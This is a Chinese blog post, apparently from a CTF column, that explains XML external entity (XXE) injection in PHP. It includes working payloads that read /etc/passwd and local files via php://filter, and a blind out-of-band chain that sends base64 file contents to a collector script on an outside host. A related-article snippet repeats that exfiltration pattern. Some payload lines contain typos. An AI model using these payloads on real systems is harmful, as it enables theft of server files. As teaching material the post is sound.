Web安全:XEE 实体注入

最新推荐文章于 2024-07-31 22:53:53 发布
最新推荐文章于 2024-07-31 22:53:53 发布
阅读量872 收藏 2
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43415644/article/details/94974844
版权

该笔记仅用于信息防御技术教学,请勿用于其他用途

目录

一、什么是XXE?

二、XXE原理:

一、什么是XXE?

   XXE=外部实体注入攻击

建议首先详细阅读资料,没有什么问题是读一遍资料解决不了的,如果有,那么就多读几遍,直到烂熟于心:

http://www.w3school.com.cn/dtd/dtd_entities.asp

典型攻击如下:

<?xml version="1.0" encoding="ISO-8858-1"?> 
<?DOCTYPE foo[
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "file:///etc//passwd">]>
<foo>$xxe;</foo>

二、XXE原理:

php中存在一个函数:simplexml_load_string() 这个函数是将xml转化为对象

<?php
 $test = '<!DOCTYPE scan [<!ENTITY test SYSTEM "file:///Users/mac/Desktop/chopper.txt">]><scan>&test;</scan>';

$obj =simplexml_load_string($test,'SimpleXMLElement',LIBXML_NOENT);
print_r($obj);
?>

使用php伪协议读取文件:(文件内容会自动被base64加密,这是为了传输方便,加密的特点是结尾通常是=或者==)注意 base64不仅可以加密字符串还可以加密图片

<?php
 $test = '<!DOCTYPE scan [<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=Users/mac/Desktop/chopper.txt">]><scan>&test;</scan>';

$obj =simplexml_load_string($test,'SimpleXMLElement',LIBXML_NOENT);
print_r($obj);
?>

但是很多时候,后端语言解析了XML后其实并不会给你输出,这样我们也可以进行XXE攻击。

我们先读取我们想要的文件例如:file:///Users/mac/Desktop/chopper.txt,为了方便传输,我们使用php伪协议将文件内容base64加密读取。

然后我们再去调用一个外部的xml,比如1.xml:(<!ENTITY %remote SYSTEM "http://127.0.0.1:8888/1.xml),内容为:

<!ENTITY %all "<!ENTITY &#x25;send  SYSTEM 'http://127.0.0.1:8888/2,php?id=%file;'>">
%all;

这个1.xml会被加载到原本的xml,然后我们最后来调用,然后你读取出来的文件内容会用get传参的方式传递给2.php,然后2.php会记录下来存储到3.txt

2.php内容如下:

<?php 
 file_put_contents("3.txt",$_GET["id"],FILE_APPEND);
?>

整体代码如下:

<?php
$test = <<<EOF
<?xml version = "1.0"?>
<!DOCTYPE ANY[
   <!ENTITY %file SYSTEM "php://filter/read = convert.base64-encode/resource = Users/mac/Desktop/chopper.txt">
   <!ENTITY %remote SYSTEM "http://127.0.0.1:8888/1.xml">
   %remote;
   %send;
]>
EOF
$obj = simplexml_load_string($test,'SimpleXMLElement',LIBXML_NOENT);
?>

这个代码等价于:

<?php
$test = <<<EOF
<?xml version = "1.0"?>
<!DOCTYPE ANY[
   <!ENTITY %file SYSTEM "php://filter/read = convert.base64-encode/resource = Users/mac/Desktop/chopper.txt">
   <!ENTITY %all "<!ENTITY &#x25;send  SYSTEM 'http://127.0.0.1:8888/2.php?id=%file;'>">
    %all;
   %send;
]>
EOF
$obj = simplexml_load_string($test,'SimpleXMLElement',LIBXML_NOENT);
?>

进一步等价于:

<?php
$test = <<<EOF
<?xml version = "1.0"?>
<!DOCTYPE ANY[
   <!ENTITY %file SYSTEM "php://filter/read = convert.base64-encode/resource = Users/mac/Desktop/chopper.txt">
   <!ENTITY %send  SYSTEM 'http://127.0.0.1:8888/2.php?id=%file;'>
   %send;
]>
EOF
$obj = simplexml_load_string($test,'SimpleXMLElement',LIBXML_NOENT);
?>

这样看,是不是简单多了呢?

注:<<<EOF 与EOF之间的内容全部被认为是字符串

&#x25; 是 %的转义实体。

'"<>{{7*7}}
关注
专栏目录
XML相关的安全漏洞-XXE,XPATH小结(XXE注入、XPATH注入
墨痕诉清风的博客
09-04 806
DTD来规定xml意味着,DTD申明的元素下面xml必须包含,并且只能含有DTD申明的元素,(#PCDATA)为可读取的字段, (name, from)表示还包含子节点,它是个根节点或者中间节点。那一行,表示执行第三行
红队专题-Web安全/渗透测试-注入攻击
aming小老弟
10-27 211
Sql Inject(SQL注入)概述 哦,SQL注入漏洞,可怕的漏洞。在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞, 其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
XXE注入
a3320315的博客
10-28 581
0x01 贴出源地址 Blind XXE详解与Google CTF一道题分析 0x02 贴出常用payload 一、Blind XXE 1、外部DTD (1)先在自己的服务器中加入下列DTD文件 xml.dtd <!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://myip:10001/?%file;'>"...
xee靶机渗透~XEE注入
最新发布
weixin_67832625的博客
07-31 361
XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行(利用条件苛刻)、内网扫描等危害。
XXE-实体注入
Keepb1ue的博客
06-11 4322
XXE介绍 XXE即外部实体,从安全角度理解为XML外部实体注入攻击 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 文档类型定义(DTD)可定义合法的XML文档构建模块。它使用一系列合法的元素来定义文档的结构。 DTD 可被成行地声明于 XML 文档中,也可作为一个外部引用。 内部DTD声明: <!DOCTYPE 根元素 [元素声明]> 实
xxe-xml外部实体注入
nigo134的博客
07-27 3023
一、XXE 是什么 介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将
2013 OWASP Top 10 中文版:全面解析Web应用安全指南
包括SQL注入、跨站脚本(XSS)攻击、身份验证和授权问题、不安全的直接对象引用、跨站请求伪造(CSRF)、会话管理漏洞、XML外部实体(XEE)注入、文件包含漏洞、错误处理和信息披露,以及不安全的API等。 2. **教育与培训...
渗透测试工程师面试必备:SQL注入与防御策略
除了SQL注入,面试还可能涵盖其他类型的漏洞,如跨站脚本(XSS)、跨站请求伪造(CSRF)、服务器端请求伪造(SSRF)、XML外部实体(XEE)攻击以及逻辑漏洞和命令执行漏洞。渗透测试流程也是一个重要的面试话题,包括信息收集...
webug xxe注入
我只会装360的博客
10-08 579
1.什么是xxe漏洞? xxe就是XML External Entity,也就是XML外部实体注入攻击。 2.xxe漏洞的危害大吗? 大,恶意用户通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 3.xxe漏洞产生原因是什么? 允许引用外部实体时,如php中libxml_disable_entity_loader当设置为true时,就可以禁用外部实体。 随...
[web安全原理分析]-XEE漏洞入门
笑花大王
02-18 1514
前言 1 前言 XXE漏洞 XXE漏洞全称(XML External Entity Injection)即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意...
XML外部实体注入XEE)的原理和应用
QQ934072160的专栏
11-12 2226
文章目录 XXE注入 一、XML简介 二、XML实体 三、CTF中XEE攻击 XXE注入 XXE注入全称是xml external entity 注入,也就是xml外部实体注入。XXE漏洞发生在应用程序解析输入的XML时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取,命令执行等攻击。 一、XML简介 XML是一种用户自定义的标记语言,主要用于数据的存储和传输。XML文档有自己的一个格式规范。是由DTD(document type define)来控制的。例如: <?xml vers
XEE总结
a69843251的博客
02-27 1457
你的Web应用是否存在XXE漏洞? 如果你的应用是通过用户上传处理XML文件或POST请求(例如将SAML用于单点登录服务甚至是RSS)的,那么你很有可能会受到XXE的攻击。XXE是一种非常常见的漏洞类型,我们几乎每天都会碰到它。在去年的几次web应用渗透中,我们就成功的利用了好几回。 什么是XXE 简单来说,XXE就是XML外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任...
EXE注入分析之傀儡进程
酷酷的鱼 - 网络编程,服务器安全专栏
01-15 3442
最近学习PE结构,顺便看到了一篇WIN32 EXE注入的文章,代码是04年的,比较古老了, 但是代码写的很好,受益匪浅,然后在百度很少找到翻译的比较清楚的文章,这篇我在代码中加了中文注释, 方便菜鸟理解,阅读这篇帖子需要熟悉PE结构,如果你不懂PE结构建议你先去学习下, 说错的地方请各位大神指正,板砖吐口水都可以。 --- 我是淫荡的分割线--- 提到傀儡进程,首先想到的
web安全原理分析】-XEE漏洞入门
Dasdwer的博客
04-04 672
XXE漏洞XXE漏洞全称(XML External Entity Injection)即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。XML基础XMLXML(EXtensible Markup Language,可扩展标记语言)用来结构化、存储以及传输信息。
XEE 漏洞
qq_42812036的博客
02-18 819
XML XML简介 XML基本语法 基本元素 XML DTD介绍 XML是被设计用来传输和存储数据,XML文档形成一种树结构,允许自定义的标签和文档结构。 ps: HTML和他的区别在于html用来显示数据的; <?xml version=1.0 encoding="UTF-8"?> <node> <to>Tove</to> <from&...
XXE漏洞
chaojixiaojingang
08-31 1万+
XXE漏洞概念:        XXE (XML External Entity injection)XML 外部实体注入漏洞,如果XML 文件在引用外部实体时候,可以沟通构造恶意内容,可以导致读取任意文件,命令执行和对内网的攻击,这就是XXE漏洞,这个漏洞需要大家还有一定的XML协议基础,因此为了更好的去理解漏洞本身原理,必须给大家介绍一下XML相关的知识点。 (1)XML概念:     ...
XXE(外部实体注入攻击)
热门推荐
sh0rk的博客
11-24 1万+
XXE什么是XXE利用方法进阶学习防御理论上的防御措施实践有效的防御措施 什么是XXE XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。 利用方法 file:///C:/Windows/win.ini &lt;?xml versi...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值